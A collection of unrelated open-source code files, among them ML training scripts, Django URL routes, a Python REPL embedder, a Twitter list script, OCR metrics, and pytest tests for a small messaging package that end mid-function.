set_model_(model,best_model)
# Test
print ('-'*40)
test_loss, test_acc = test(args, model, device, xtest, ytest, criterion, k)
print('Test: loss={:.3f} , acc={:5.1f}%'.format(test_loss,test_acc))
# Memory Update
mat_list = get_representation_matrix_ResNet18 (model, device, xtrain, ytrain)
feature_list = update_GPM (model, mat_list, threshold, feature_list)
else:
optimizer = optim.SGD(model.parameters(), lr=args.lr)
feature_mat = []
# Projection Matrix Precomputation
for i in range(len(feature_list)):
Uf=torch.Tensor(np.dot(feature_list[i],feature_list[i].transpose())).to(device)
print('Layer {} - Projection Matrix shape: {}'.format(i+1,Uf.shape))
feature_mat.append(Uf)
print ('-'*40)
for epoch in range(1, args.n_epochs+1):
# Train
clock0=time.time()
train_projected(args, model,device,xtrain, ytrain,optimizer,criterion,feature_mat,k)
clock1=time.time()
tr_loss, tr_acc = test(args, model, device, xtrain, ytrain,criterion,k)
print('Epoch {:3d} | Train: loss={:.3f}, acc={:5.1f}% | time={:5.1f}ms |'.format(epoch,\
tr_loss, tr_acc, 1000*(clock1-clock0)),end='')
# Validate
valid_loss,valid_acc = test(args, model, device, xvalid, yvalid, criterion,k)
print(' Valid: loss={:.3f}, acc={:5.1f}% |'.format(valid_loss, valid_acc),end='')
# Adapt lr
if valid_loss<best_loss:
best_loss=valid_loss
best_model=get_model(model)
patience=args.lr_patience
print(' *',end='')
else:
patience-=1
if patience<=0:
lr/=args.lr_factor
print(' lr={:.1e}'.format(lr),end='')
if lr<args.lr_min:
print()
break
patience=args.lr_patience
adjust_learning_rate(optimizer, epoch, args)
print()
set_model_(model,best_model)
# Test
test_loss, test_acc = test(args, model, device, xtest, ytest, criterion,k)
print('Test: loss={:.3f} , acc={:5.1f}%'.format(test_loss,test_acc))
# Memory Update
mat_list = get_representation_matrix_ResNet18 (model, device, xtrain, ytrain)
feature_list = update_GPM (model, mat_list, threshold, feature_list)
# save accuracy
jj = 0
for ii in np.array(task_list)[0:task_id+1]:
xtest =data[ii]['test']['x']
ytest =data[ii]['test']['y']
_, acc_matrix[task_id,jj] = test(args, model, device, xtest, ytest,criterion,ii)
jj +=1
print('Accuracies =')
for i_a in range(task_id+1):
print('\t',end='')
for j_a in range(acc_matrix.shape[1]):
print('{:5.1f}% '.format(acc_matrix[i_a,j_a]),end='')
print()
# update task id
task_id +=1
print('-'*50)
# Simulation Results
print ('Task Order : {}'.format(np.array(task_list)))
print ('Final Avg Accuracy: {:5.2f}%'.format(acc_matrix[-1].mean()))
bwt=np.mean((acc_matrix[-1]-np.diag(acc_matrix))[:-1])
print ('Backward transfer: {:5.2f}%'.format(bwt))
print('[Elapsed time = {:.1f} ms]'.format((time.time()-tstart)*1000))
print('-'*50)
# Plots
array = acc_matrix
df_cm = pd.DataFrame(array, index = [i for i in ["T1","T2","T3","T4","T5"]],
columns = [i for i in ["T1","T2","T3","T4","T5"]])
sn.set(font_scale=1.4)
sn.heatmap(df_cm, annot=True, annot_kws={"size": 10})
plt.show()
if __name__ == "__main__":
# Training parameters
parser = argparse.ArgumentParser(description='5 datasets with GPM')
parser.add_argument('--batch_size_train', type=int, default=64, metavar='N',
help='input batch size for training (default: 64)')
parser.add_argument('--batch_size_test', type=int, default=64, metavar='N',
help='input batch size for testing (default: 64)')
parser.add_argument('--n_epochs', type=int, default=100, metavar='N',
help='number of training epochs/task (default: 200)')
parser.add_argument('--seed', type=int, default=37, metavar='S',
help='random seed (default: 37)')
parser.add_argument('--pc_valid',default=0.05,type=float,
help='fraction of training data used for validation')
# Optimizer parameters
parser.add_argument('--lr', type=float, default=0.1, metavar='LR',
help='learning rate (default: 0.01)')
parser.add_argument('--momentum', type=float, default=0.9, metavar='M',
help='SGD momentum (default: 0.9)')
parser.add_argument('--lr_min', type=float, default=1e-3, metavar='LRM',
help='minimum lr rate (default: 1e-5)')
parser.add_argument('--lr_patience', type=int, default=5, metavar='LRP',
help='hold before decaying lr (default: 6)')
parser.add_argument('--lr_factor', type=int, default=3, metavar='LRF',
help='lr decay factor (default: 2)')
# CUDA parameters
parser.add_argument('--gpu', type=str, default="0", metavar='GPU',
help="GPU ID for single GPU training")
args = parser.parse_args()
print('='*100)
print('Arguments =')
for arg in vars(args):
print('\t'+arg+':',getattr(args,arg))
print('='*100)
main(args)
|
the-stack_106_16844
|
from django.conf.urls import patterns, url
from views import *
urlpatterns = patterns('',
url(r'^$', contact_list, name='contacts'),
url(r'^list/$', contact_list, name='contact_list'),
url(r'^add/$', contact_add, name='contact_add'),
url(r'^edit/$', contact_edit, name='contact_edit'),
url(r'^delete/$', contact_delete, name='contact_delete'),
)
|
the-stack_106_16845
|
"""
Encapsulate the methodology to process a segment from the moves-api.
Builds rdf triples based on:
http://motools.sourceforge.net/event/event.html
"""
import logging
from rhobot.components.storage import StoragePayload
from move_bot.components.update_service.interval_handler import IntervalHandler
from move_bot.components.update_service.location_handler import LocationHandler
from move_bot.components.namespace import EVENT, MOVES_SEGMENT
from rdflib.namespace import RDFS, DC, DCTERMS
logger = logging.getLogger(__name__)
class ProcessSegment:
"""
Callable that encapsulates the work that needs to be done to insert an event into the data store inside a promise.
These steps are:
If there is an event that already exists that needs to be updated.
Update the contents of that event.
Else:
Create the new event.
"""
def __init__(self, segment, owner, xmpp):
"""
Construct the callable.
:param segment: segment to process.
:param owner: owner of the installation
:param xmpp: bot details
"""
self._segment = segment
self._scheduler = xmpp['rho_bot_scheduler']
self._storage_client = xmpp['rho_bot_storage_client']
self._promise = None
self._publisher = xmpp['rho_bot_rdf_publish']
self._representation_manager = xmpp['rho_bot_representation_manager']
self._owner = owner
self._node_id = None
self.xmpp = xmpp
self.interval_handler = IntervalHandler(xmpp)
self.location_handler = LocationHandler(xmpp, owner)
def __call__(self, *args):
"""
Executable method for the instance. This will look up to see if the object needs to be updated or created, then
instantiate the correct promise chain which will accomplish the task.
:param args:
:return:
"""
logger.info('Processing segment: %s' % self._segment)
self._promise = self._scheduler.promise()
# Check in the database to see if there is anything that currently has the segment defined in it
payload = StoragePayload()
payload.add_type(EVENT.Event)
payload.add_property(RDFS.seeAlso, MOVES_SEGMENT[self._segment['startTime']])
self._storage_client.find_nodes(payload).then(self._handle_find_result)
return self._promise
def _finish_process(self, session=None):
"""
Common exit point for the promise chain.
:param session:
:return:
"""
self._promise.resolved(session)
return None
def _handle_find_result(self, result):
if result.results:
self._node_id = result.results[0].about
update_promise = self._scheduler.defer(self.start_session).then(self._find_place)
update_promise = update_promise.then(self._get_interval).then(self._update_node)
update_promise.then(self._finish_process, lambda s: self._promise.rejected(s))
return update_promise
else:
create_promise = self._scheduler.defer(self.start_session).then(self._find_place)
create_promise = create_promise.then(self._create_interval).then(self._create_node)
create_promise.then(self._finish_process, lambda s: self._promise.rejected(s))
return create_promise
def start_session(self):
return dict()
def _find_place(self, session):
"""
Find the place associated with the segment.
:param session:
:return:
"""
logger.debug('Finding place: %s' % session)
location_promise = self.location_handler(self._segment['place']).then(
self._scheduler.generate_promise_handler(self._update_session, session, 'location'))
return location_promise
def _get_interval(self, session):
"""
Get the event node to be updated, then update the interval object, and put the result into the session value.
:param session: session variable.
:return:
"""
logger.debug('Get Interval: %s' % session)
def update_interval(result):
interval_reference = result.references.get(str(EVENT.time), None)
if interval_reference:
interval_reference = interval_reference[0]
interval_promise = self.interval_handler(interval_reference,
self._segment['startTime'],
self._segment['endTime'])
interval_promise = interval_promise.then(
self._scheduler.generate_promise_handler(self._update_session, session, 'interval'))
return interval_promise
payload = StoragePayload()
payload.about = self._node_id
promise = self._storage_client.get_node(payload).then(update_interval)
return promise
def _create_interval(self, session):
"""
Create a new interval and add it to the session variable.
:param session:
:return:
"""
logger.debug('Create Interval: %s' % session)
interval_promise = self.interval_handler(None, self._segment['startTime'], self._segment['endTime'])
interval_promise = interval_promise.then(
self._scheduler.generate_promise_handler(self._update_session, session, 'interval'))
return interval_promise
@staticmethod
def _update_session(interval_result, session, key):
"""
Process the results of the creation.
"""
session[key] = interval_result
return session
def _create_node(self, session):
"""
Create a new node based and add additional properties based on the session.
:param session:
:return:
"""
logger.debug('Creating Node')
payload = self._convert_segment_to_payload(session)
# Only set the title when first creating it. The update might override a field that has been changed by the
# user.
place_name = self._segment['place'].get('name', 'Unknown')
payload.add_property(key=DC.title, value=place_name)
promise = self._storage_client.create_node(payload).then(
self._scheduler.generate_promise_handler(self._publish_modifications, created=True)).then(
lambda s: s.results[0].about)
return promise
def _update_node(self, session):
"""
Method to be used in a deferred that will update the node responsible for execution.
:return:
"""
logger.info('Updating Node')
payload = self._convert_segment_to_payload(session)
# Update that about field so that the node can be updated.
payload.about = self._node_id
promise = self._storage_client.update_node(payload).then(
self._scheduler.generate_promise_handler(self._publish_modifications, created=False)).then(
lambda s: s.results[0].about)
return promise
def _convert_segment_to_payload(self, session):
"""
Convert the segment details into a payload object.
:return:
"""
payload = StoragePayload()
payload.add_type(EVENT.Event)
payload.add_reference(key=EVENT.agent, value=self._owner)
payload.add_reference(key=DCTERMS.creator, value=self._representation_manager.representation_uri)
payload.add_property(RDFS.seeAlso, MOVES_SEGMENT[self._segment['startTime']])
if session['location']:
payload.add_reference(key=EVENT.place, value=session['location'][0])
if session['interval']:
payload.add_reference(key=EVENT.time, value=session['interval'][0])
return payload
def _publish_modifications(self, result, created=True):
self._publisher.publish_all_results(result, created=created)
return result
|
the-stack_106_16847
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import cv2
from atari import AtariPlayer
from atari_wrapper import FrameStack, MapState, FireResetEnv
def get_player(rom,
image_size,
viz=False,
train=False,
frame_skip=1,
context_len=1):
env = AtariPlayer(
rom,
frame_skip=frame_skip,
viz=viz,
live_lost_as_eoe=train,
max_num_frames=60000)
env = FireResetEnv(env)
env = MapState(env, lambda im: cv2.resize(im, image_size))
if not train:
# in training, context is taken care of in expreplay buffer
env = FrameStack(env, context_len)
return env
|
the-stack_106_16848
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
class LRScheduler(object):
"""Base class of a learning rate scheduler.
A scheduler returns a new learning rate based on the number of updates that have
been performed.
Parameters
----------
base_lr : float, optional
The initial learning rate.
warmup_epoch: int
number of warmup steps used before this scheduler starts decay
warmup_begin_lr: float
if using warmup, the learning rate from which it starts warming up
warmup_mode: string
warmup can be done in two modes.
'linear' mode gradually increases lr with each step in equal increments
'constant' mode keeps lr at warmup_begin_lr for warmup_steps
"""
def __init__(self, base_lr=0.01, step=(30, 60), factor=0.1,
warmup_epoch=0, warmup_begin_lr=0, warmup_mode='linear'):
self.base_lr = base_lr
self.learning_rate = base_lr
if isinstance(step, tuple) or isinstance(step, list):
self.step = step
else:
self.step = [step*(i+1) for i in range(20)]
self.factor = factor
assert isinstance(warmup_epoch, int)
self.warmup_epoch = warmup_epoch
self.warmup_final_lr = base_lr
self.warmup_begin_lr = warmup_begin_lr
if self.warmup_begin_lr > self.warmup_final_lr:
raise ValueError("Base lr has to be higher than warmup_begin_lr")
if self.warmup_epoch < 0:
raise ValueError("Warmup steps has to be positive or 0")
if warmup_mode not in ['linear', 'constant']:
raise ValueError("Supports only linear and constant modes of warmup")
self.warmup_mode = warmup_mode
def update(self, num_epoch):
if self.warmup_epoch > num_epoch:
# warmup strategy
if self.warmup_mode == 'linear':
self.learning_rate = self.warmup_begin_lr + (self.warmup_final_lr - self.warmup_begin_lr) * \
num_epoch / self.warmup_epoch
elif self.warmup_mode == 'constant':
self.learning_rate = self.warmup_begin_lr
else:
count = sum([1 for s in self.step if s <= num_epoch])
self.learning_rate = self.base_lr * pow(self.factor, count)
return self.learning_rate
|
the-stack_106_16849
|
"""
Utility for creating a Python repl.
::
from prompt_toolkit.contrib.repl import embed
embed(globals(), locals(), vi_mode=False)
"""
# Warning: don't import `print_function` from __future__, otherwise we will
# also get the print_function inside `eval` on Python 2.7.
from __future__ import unicode_literals
from pygments import highlight
from pygments.formatters.terminal256 import Terminal256Formatter
from pygments.lexers import PythonTracebackLexer
from prompt_toolkit import AbortAction, Exit
from prompt_toolkit.contrib.python_input import PythonCommandLineInterface, PythonStyle, AutoCompletionStyle
from six import exec_
import sys
import os
import traceback
__all__ = ('PythonRepl', 'embed')
class PythonRepl(PythonCommandLineInterface):
def start_repl(self, startup_paths=None):
"""
Start the Read-Eval-Print Loop.
:param startup_paths: Array of paths to Python files.
"""
self._execute_startup(startup_paths)
# Run REPL loop until Exit.
try:
while True:
# Read
document = self.read_input(
on_abort=AbortAction.RETRY,
on_exit=AbortAction.RAISE_EXCEPTION)
line = document.text
if line and not line.isspace():
try:
# Eval and print.
self._execute(line)
except KeyboardInterrupt as e: # KeyboardInterrupt doesn't inherit from Exception.
self._handle_keyboard_interrupt(e)
except Exception as e:
self._handle_exception(e)
self.current_statement_index += 1
except Exit:
pass
def _execute_startup(self, startup_paths):
"""
Load and execute startup file.
"""
if startup_paths:
for path in startup_paths:
with open(path, 'r') as f:
code = compile(f.read(), path, 'exec')
exec_(code, self.get_globals(), self.get_locals())
def _execute(self, line):
"""
Evaluate the line and print the result.
"""
if line[0:1] == '!':
# Run as shell command
os.system(line[1:])
else:
# Try eval first
try:
result = eval(line, self.get_globals(), self.get_locals())
locals = self.get_locals()
locals['_'] = locals['_%i' % self.current_statement_index] = result
if result is not None:
try:
self.stdout.write('Out[%i]: %r\n' % (self.current_statement_index, result))
except UnicodeDecodeError:
# In Python 2: `__repr__` should return a bytestring,
# so to put it in a unicode context could raise an
# exception that the 'ascii' codec can't decode certain
# characters. Decode as utf-8 in that case.
self.stdout.write('Out[%i]: %s\n' % (self.current_statement_index, repr(result).decode('utf-8')))
# If not a valid `eval` expression, run using `exec` instead.
except SyntaxError:
exec_(line, self.get_globals(), self.get_locals())
self.stdout.write('\n')
self.stdout.flush()
def _handle_exception(self, e):
# Instead of just calling ``traceback.format_exc``, we take the
# traceback and skip the bottom calls of this framework.
t, v, tb = sys.exc_info()
tblist = traceback.extract_tb(tb)[3:]
l = traceback.format_list(tblist)
if l:
l.insert(0, "Traceback (most recent call last):\n")
l.extend(traceback.format_exception_only(t, v))
tb = ''.join(l)
# Format exception and write to output.
self.stdout.write(highlight(tb, PythonTracebackLexer(), Terminal256Formatter()))
self.stdout.write('%s\n\n' % e)
self.stdout.flush()
def _handle_keyboard_interrupt(self, e):
self.stdout.write('\rKeyboardInterrupt\n\n')
self.stdout.flush()
def embed(globals=None, locals=None, vi_mode=False, history_filename=None, no_colors=False,
autocompletion_style=AutoCompletionStyle.POPUP_MENU, startup_paths=None, always_multiline=False):
"""
Call this to embed Python shell at the current point in your program.
It's similar to `IPython.embed` and `bpython.embed`. ::
from prompt_toolkit.contrib.repl import embed
embed(globals(), locals(), vi_mode=False)
:param vi_mode: Boolean. Use Vi instead of Emacs key bindings.
"""
globals = globals or {}
locals = locals or globals
def get_globals():
return globals
def get_locals():
return locals
cli = PythonRepl(get_globals, get_locals, vi_mode=vi_mode, history_filename=history_filename,
style=(None if no_colors else PythonStyle),
autocompletion_style=autocompletion_style, always_multiline=always_multiline)
cli.start_repl(startup_paths=startup_paths)
|
the-stack_106_16850
|
#!/usr/bin/env python3
# Copyright (c) 2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test bitcoin-cli"""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal
class TestBitcoinCli(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def run_test(self):
"""Main test logic"""
self.log.info("Compare responses from getinfo RPC and `supermario-cli getinfo`")
cli_get_info = self.nodes[0].cli.getinfo()
rpc_get_info = self.nodes[0].getinfo()
assert_equal(cli_get_info, rpc_get_info)
if __name__ == '__main__':
TestBitcoinCli().main()
|
the-stack_106_16851
|
from django.conf.urls import url
from paying_for_college.views import *
urlpatterns = [
# url(r'^$',
# BuildComparisonView.as_view(), name='worksheet'),
url(r'^offer/$',
OfferView.as_view(), name='offer'),
url(r'^offer/test/$',
OfferView.as_view(), {'test': True}, name='offer_test'),
url(r'^api/email/$', EmailLink.as_view(), name='email'),
url(r'^feedback/$',
FeedbackView.as_view(),
name='pfc-feedback'),
url(r'^about-this-tool/$',
BaseTemplateView.as_view(template_name="technote.html"),
name='pfc-technote'),
url(r'^api/search-schools.json',
school_search_api,
name='school_search'),
url(r'^api/program/([^/]+)/$',
ProgramRepresentation.as_view(),
name='program-json'),
url(r'^api/constants/$',
ConstantsRepresentation.as_view(),
name='constants-json'),
url(r'^api/national-stats/$',
StatsRepresentation.as_view(),
name='national-stats-generic-json'),
url(r'^api/national-stats/(?P<id_pair>[^/]+)/$',
StatsRepresentation.as_view(),
name='national-stats-json'),
url(r'^api/expenses/$',
ExpenseRepresentation.as_view(),
name='expenses-json'),
url(r'^api/verify/$',
VerifyView.as_view(),
name='verify'),
url(r'^api/school/(\d+)/$',
SchoolRepresentation.as_view(),
name='school-json'),
]
|
the-stack_106_16853
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from __future__ import division
##
# Copyright (C) Benjamin D. McGinnes, 2013-2017
# [email protected]
# OpenPGP/GPG key: 0x321E4E2373590E5D
#
# Version: 0.0.1
#
# BTC: 1KvKMVnyYgLxU1HnLQmbWaMpDx3Dz15DVU
#
#
#
# Requirements:
#
# * Python 3.4 or later.
#
# Options and notes:
#
# Usage:
#
# __name__ <list-slug> user1 user2 user3 etc.
#
##
from license import __author__
from license import __copyright__
from license import __license__
__version__ = "0.0.1"
from license import __bitcoin__
import math
import sys
from twython import Twython, TwythonError
from config import *
twitter = Twython(APP_KEY, APP_SECRET, OAUTH_TOKEN, OAUTH_TOKEN_SECRET)
"""
Add one or more usernames to a list of script owner.
"""
cred = twitter.verify_credentials()
l = len(sys.argv)
if l == 1:
listname = input("Enter the ID or name (slug) of the list: ")
targetx = input("Enter usernames or IDs to add (separate by spaces): ")
elif l == 2:
listname = sys.argv[1]
targetx = input("Enter usernames or IDs to add (separate by spaces): ")
elif l >= 3:
listname = sys.argv[1]
targetx = " ".join(sys.argv[2:l])
try:
listid = int(listname)
except:
listid = str(listname)
owner = cred["screen_name"]
targetz = targetx.split()
targety = []
lt = len(targetz)
for i in range(lt):
if targetz[i].isnumeric is True:
target1 = int(targetz[i])
target2 = str(targetz[i])
else:
target1 = str(targetz[i])
target2 = None
if target2 is None:
target = target1
else:
try:
t1a = twitter.show_user(user_id=target1)
target = t1a["screen_name"]
except:
target = target2
targety.append(target)
datachecklist = []
if lt == 1:
try:
data = twitter.add_list_member(slug=listid, owner_screen_name=owner,
screen_name=target)
except TwythonError as e:
print(e)
data = None
if data is not None:
datacheck = True
else:
datacheck = False
elif lt >= 2 and lt <= 100:
targets = ", ".join(targety)
try:
data = twitter.create_list_members(slug=listid,
owner_screen_name=owner,
user_id=targets)
except TwythonError as e:
print(e)
data = None
if data is not None:
datacheck = True
else:
datacheck = False
elif lt > 100:
t0 = lt / 100
t1 = math.floor(t0)
t2 = t1 * 100
t3 = lt - t2
for i in range(t1):
targets = ", ".join(targety[(i * 100):((i + 1) * 100)])
try:
data = twitter.create_list_members(slug=listid,
owner_screen_name=owner,
user_id=targets)
except TwythonError as e:
print(e)
data = None
if data is not None:
datachecklist.append(targets)
else:
pass
for i in range(t2, t3):
targets = ", ".join(targety[(i * 100):((i + 1) * 100)])
try:
data = twitter.create_list_members(slug=listid,
owner_screen_name=owner,
user_id=targets)
except TwythonError as e:
print(e)
data = None
if data is not None:
datachecklist.append(targets)
else:
pass
if len(datachecklist) > 0:
datacheck = True
else:
datacheck = False
targeted = ", ".join(targety)
if datacheck is True:
print("""{0} added to https://twitter.com{1} which now has {2} members.
""".format(targeted, data['uri'], data['member_count']))
else:
print("No users added to any list.")
|
the-stack_106_16854
|
import re
from difflib import SequenceMatcher
from rapidfuzz import string_metric
def cal_true_positive_char(pred, gt):
"""Calculate correct character number in prediction.
Args:
pred (str): Prediction text.
gt (str): Ground truth text.
Returns:
true_positive_char_num (int): The true positive number.
"""
all_opt = SequenceMatcher(None, pred, gt)
true_positive_char_num = 0
for opt, _, _, s2, e2 in all_opt.get_opcodes():
if opt == 'equal':
true_positive_char_num += (e2 - s2)
else:
pass
return true_positive_char_num
def count_matches(pred_texts, gt_texts):
"""Count the various match number for metric calculation.
Args:
pred_texts (list[str]): Predicted text string.
gt_texts (list[str]): Ground truth text string.
Returns:
match_res: (dict[str: int]): Match number used for
metric calculation.
"""
match_res = {
'gt_char_num': 0,
'pred_char_num': 0,
'true_positive_char_num': 0,
'gt_word_num': 0,
'match_word_num': 0,
'match_word_ignore_case': 0,
'match_word_ignore_case_symbol': 0
}
comp = re.compile('[^A-Z^a-z^0-9^\u4e00-\u9fa5]')
norm_ed_sum = 0.0
for pred_text, gt_text in zip(pred_texts, gt_texts):
if gt_text == pred_text:
match_res['match_word_num'] += 1
gt_text_lower = gt_text.lower()
pred_text_lower = pred_text.lower()
if gt_text_lower == pred_text_lower:
match_res['match_word_ignore_case'] += 1
gt_text_lower_ignore = comp.sub('', gt_text_lower)
pred_text_lower_ignore = comp.sub('', pred_text_lower)
if gt_text_lower_ignore == pred_text_lower_ignore:
match_res['match_word_ignore_case_symbol'] += 1
match_res['gt_word_num'] += 1
# normalized edit distance
edit_dist = string_metric.levenshtein(pred_text_lower_ignore,
gt_text_lower_ignore)
norm_ed = float(edit_dist) / max(1, len(gt_text_lower_ignore),
len(pred_text_lower_ignore))
norm_ed_sum += norm_ed
# number to calculate char level recall & precision
match_res['gt_char_num'] += len(gt_text_lower_ignore)
match_res['pred_char_num'] += len(pred_text_lower_ignore)
true_positive_char_num = cal_true_positive_char(
pred_text_lower_ignore, gt_text_lower_ignore)
match_res['true_positive_char_num'] += true_positive_char_num
normalized_edit_distance = norm_ed_sum / max(1, len(gt_texts))
match_res['ned'] = normalized_edit_distance
return match_res
def eval_ocr_metric(pred_texts, gt_texts):
"""Evaluate the text recognition performance with metric: word accuracy and
1-N.E.D. See https://rrc.cvc.uab.es/?ch=14&com=tasks for details.
Args:
pred_texts (list[str]): Text strings of prediction.
gt_texts (list[str]): Text strings of ground truth.
Returns:
eval_res (dict[str: float]): Metric dict for text recognition, include:
- word_acc: Accuracy in word level.
- word_acc_ignore_case: Accuracy in word level, ignore letter case.
- word_acc_ignore_case_symbol: Accuracy in word level, ignore
letter case and symbol. (default metric for
academic evaluation)
- char_recall: Recall in character level, ignore
letter case and symbol.
- char_precision: Precision in character level, ignore
letter case and symbol.
- 1-N.E.D: 1 - normalized_edit_distance.
"""
assert isinstance(pred_texts, list)
assert isinstance(gt_texts, list)
assert len(pred_texts) == len(gt_texts)
match_res = count_matches(pred_texts, gt_texts)
eps = 1e-8
char_recall = 1.0 * match_res['true_positive_char_num'] / (
eps + match_res['gt_char_num'])
char_precision = 1.0 * match_res['true_positive_char_num'] / (
eps + match_res['pred_char_num'])
word_acc = 1.0 * match_res['match_word_num'] / (
eps + match_res['gt_word_num'])
word_acc_ignore_case = 1.0 * match_res['match_word_ignore_case'] / (
eps + match_res['gt_word_num'])
word_acc_ignore_case_symbol = 1.0 * match_res[
'match_word_ignore_case_symbol'] / (
eps + match_res['gt_word_num'])
eval_res = {}
eval_res['word_acc'] = word_acc
eval_res['word_acc_ignore_case'] = word_acc_ignore_case
eval_res['word_acc_ignore_case_symbol'] = word_acc_ignore_case_symbol
eval_res['char_recall'] = char_recall
eval_res['char_precision'] = char_precision
eval_res['1-N.E.D'] = 1.0 - match_res['ned']
for key, value in eval_res.items():
eval_res[key] = float('{:.4f}'.format(value))
return eval_res
|
the-stack_106_16855
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests for `temp` package."""
import datetime
import pytest
import random
from click.testing import CliRunner
from temp import cli
from temp import temp
@pytest.fixture
def response():
"""Sample pytest fixture.
See more at: http://doc.pytest.org/en/latest/fixture.html
"""
# import requests
# return requests.get('https://github.com/audreyr/cookiecutter-pypackage')
def test_content(response):
"""Sample pytest test function with the pytest fixture as an argument."""
# from bs4 import BeautifulSoup
# assert 'GitHub' in BeautifulSoup(response.content).title.string
def test_command_line_interface():
"""Test the CLI."""
runner = CliRunner()
result = runner.invoke(cli.main)
assert result.exit_code == 0
assert 'temp.cli.main' in result.output
help_result = runner.invoke(cli.main, ['--help'])
assert help_result.exit_code == 0
assert '--help Show this message and exit.' in help_result.output
def test_adding_user():
new_user = temp.User().create()
assert temp.Storage().users[new_user.uuid] == new_user
def test_adding_one_follower():
user1 = temp.User().create()
user2 = temp.User().create()
user1.subscribe_to(user2)
assert temp.Storage().subscription_list[user1.uuid] == {user2.uuid, }
assert temp.Storage().followers_back_list[user2.uuid] == {user1.uuid, }
def test_adding_two_followers():
user1 = temp.User().create()
user2 = temp.User().create()
user3 = temp.User().create()
user1.subscribe_to(user2)
user1.subscribe_to(user3)
assert temp.Storage().subscription_list[user1.uuid] == {user2.uuid, user3.uuid}
assert temp.Storage().followers_back_list[user2.uuid] == {user1.uuid, }
assert temp.Storage().followers_back_list[user3.uuid] == {user1.uuid, }
class TestSuperRichData:
@classmethod
def teardown_class(cls):
"""Runs at end of class"""
temp.Storage().clear()
@classmethod
def setup_class(cls):
"""Runs once per class"""
cls.total_number_of_messages = 1000
cls.user1 = temp.User().create()
cls.user2 = temp.User().create()
cls.user3 = temp.User().create()
cls.user1.subscribe_to(cls.user2)
cls.user1.subscribe_to(cls.user3)
for i in range(cls.total_number_of_messages):
user = random.choice([cls.user1, cls.user2, cls.user3])
in_reply_user = random.choice([None, None, None, cls.user1, cls.user2, cls.user3])
text = temp.generate_uuid()[0:8]
if in_reply_user:
try:
in_reply_message = random.choice(temp.Storage.messages_by_users[in_reply_user.uuid])
except AttributeError:
in_reply_message = None
else:
in_reply_message = None
message = temp.Message(user=user, body=text, in_reply_to=in_reply_message)
message.created = message.created + datetime.timedelta(seconds=i) + datetime.timedelta(
seconds=random.choice([-5, 5]))
message.post()
def test_total_number_of_messages(self):
assert len(temp.Storage().messages_list) == self.total_number_of_messages
def test_timeline_subscribed_to_zero(self):
assert temp.Timeline().generate_timeline(self.user2) == []
assert temp.Timeline().generate_timeline(self.user3) == []
def test_timeline_for_one_followers1(self):
assert len(temp.Timeline().generate_timeline(self.user2)) <= 50
def test_timeline_for_one_followers2(self):
assert len(temp.Timeline().generate_timeline(self.user3)) <= 50
def test_timeline_for_different_k(self):
max_k = len(temp.Timeline().generate_timeline(self.user3))
print("We generated maximum of %s messages" % max_k)
for k in range(0, max_k):
print("Test for %s timeline limit" % k)
assert len(temp.Timeline().generate_timeline(self.user3, k_limit=k)) == k
class TestHandmadeData:
@classmethod
def teardown_class(cls):
"""Runs at end of class"""
temp.Storage().clear()
@classmethod
def setup_class(cls):
"""Runs once per class"""
cls.user1 = temp.User().create()
cls.user2 = temp.User().create()
cls.user3 = temp.User().create()
cls.user1.subscribe_to(cls.user2)
cls.user1.subscribe_to(cls.user3)
cls.message1 = temp.Message(cls.user1, "M1: Body 1", in_reply_to=None)
cls.message1.post()
cls.message2 = temp.Message(cls.user2, "M2: In reply to M1 from first user", in_reply_to=cls.message1.uuid)
cls.message2.created = cls.message2.created + datetime.timedelta(seconds=2)
cls.message2.post()
cls.message3 = temp.Message(cls.user2, "M3: Second reply to first user message", in_reply_to=cls.message1.uuid)
cls.message3.created = cls.message3.created + datetime.timedelta(seconds=3)
cls.message3.post()
def test_message_name(self):
assert str(self.message1) == \
'({}: {} at {:%m:%S}, {})'.format(
self.message1.author[0:5], self.message1.body, self.message1.created, self.message1.uuid[0:5])
def test_user_connection(self):
assert temp.Storage().subscription_list[self.user1.uuid] == {self.user2.uuid, self.user3.uuid}
assert temp.Storage().subscription_list[self.user2.uuid] == set()
assert temp.Storage().subscription_list[self.user3.uuid] == set()
assert temp.Storage().followers_back_list[self.user2.uuid] == {self.user1.uuid}
assert temp.Storage().followers_back_list[self.user3.uuid] == {self.user1.uuid}
def test_create_messages(self):
assert temp.Storage().messages_list[self.message1.uuid] == self.message1
assert temp.Storage().messages_list[self.message2.uuid] == self.message2
assert temp.Storage().messages_list[self.message3.uuid] == self.message3
def test_create_messages_in_reply(self):
assert temp.Storage().messages_by_users[self.user1.uuid] == [self.message1.uuid, self.message2.uuid,
self.message3.uuid]
assert temp.Storage().messages_by_users[self.user2.uuid] == [self.message2.uuid, self.message3.uuid]
def test_timeline_for_zero_followed(self):
assert temp.Timeline().generate_timeline(self.user2) == []
assert temp.Timeline().generate_timeline(self.user3) == []
assert temp.Messaging().timeline(self.user2) == []
assert temp.Messaging().timeline(self.user3) == []
def test_timeline_for_two_followed(self):
assert temp.Timeline().generate_timeline(self.user1) == [self.message3, self.message2]
assert temp.Messaging().timeline(self.user1) == [self.message3, self.message2]
def test_get_wrong_uuid(self):
with pytest.raises(AttributeError):
temp.User().get(temp.generate_uuid())
def test_biased_in_reply_message(self):
fake_message_object = temp.Message(self.user1, "")
message_fake = temp.Message(self.user1, "Second in reply to 1", in_reply_to=fake_message_object.uuid)
with pytest.raises(AttributeError, message="Linked message by \"in_relpy\" is not exist"):
message_fake.post()
def test_biased_in_user_message(self):
fake_message_object = temp.Message(self.user1, "")
fake_message_object.author = temp.generate_uuid()
with pytest.raises(AttributeError):
fake_message_object.post()
def test_user_representation(self):
assert str(self.user1) == self.user1.uuid[0:5]
def test_message_order(self):
